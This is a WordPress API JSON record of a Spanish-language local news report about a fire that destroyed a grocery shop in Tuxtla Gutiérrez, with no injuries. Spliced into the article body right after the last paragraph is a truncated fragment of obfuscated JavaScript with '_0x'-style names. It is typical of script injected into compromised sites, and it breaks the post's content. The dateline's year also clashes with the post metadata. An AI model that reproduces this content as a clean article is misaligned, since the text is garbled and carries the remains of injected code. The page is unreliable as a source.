{"id":7833,"date":"2023-01-05T02:38:32","date_gmt":"2023-01-05T02:38:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7833"},"modified":"2023-01-05T02:38:32","modified_gmt":"2023-01-05T02:38:32","slug":"voraz-incendio-acaba-con-comercio-de-abarrotes","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7833","title":{"rendered":"Voraz incendio acaba con Comercio de abarrotes"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"406\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1672885755610.jpg\" alt=\"\" class=\"wp-image-7834\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1672885755610.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1672885755610-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 4 de Enero del 2022. Tuxtla Guti\u00e9rrez.- Un negocio de abarrotes y venta de alcanc\u00edas fue consumido por un voraz incendio ocurrido la tarde de este mi\u00e9rcoles en la zona Sur de Tuxtla Guti\u00e9rrez.De acuerdo con el propietario, el fuego comenz\u00f3 en el cableado y de manera r\u00e1pida se propag\u00f3 por todo el lugar.Como pudo sali\u00f3 junto con su esposa y sus dos hijos para ponerse a salvo.Testigos llamaron a los n\u00fameros de emergencias y llegaron elementos de Protecci\u00f3n Civil Municipal, y de Bomberos que con pipas de diez mil litros atacaron el fuego.Casi media hora estuvieron combatiendo el incendio hasta sofocarlo.El fuego consumi\u00f3 toda la mercanc\u00eda, estimada en unos 25 mil pesos.Afortunadamente no hubo personas lesionadas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 4 de Enero del 2022. Tuxtla Guti\u00e9rrez.- Un negocio de abarrotes y venta de alcanc\u00edas fue consumido por un voraz incendio ocurrido la tarde de este mi\u00e9rcoles en la zona Sur de Tuxtla Guti\u00e9rrez.De acuerdo con el propietario, el fuego comenz\u00f3 en el cableado y de manera r\u00e1pida se propag\u00f3 por todo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7834,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-7833","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7833","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7833"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7833\/revisions"}],"predecessor-version":[{"id":7835,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7833\/revisions\/7835"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7834"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7833"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7833"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7833"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}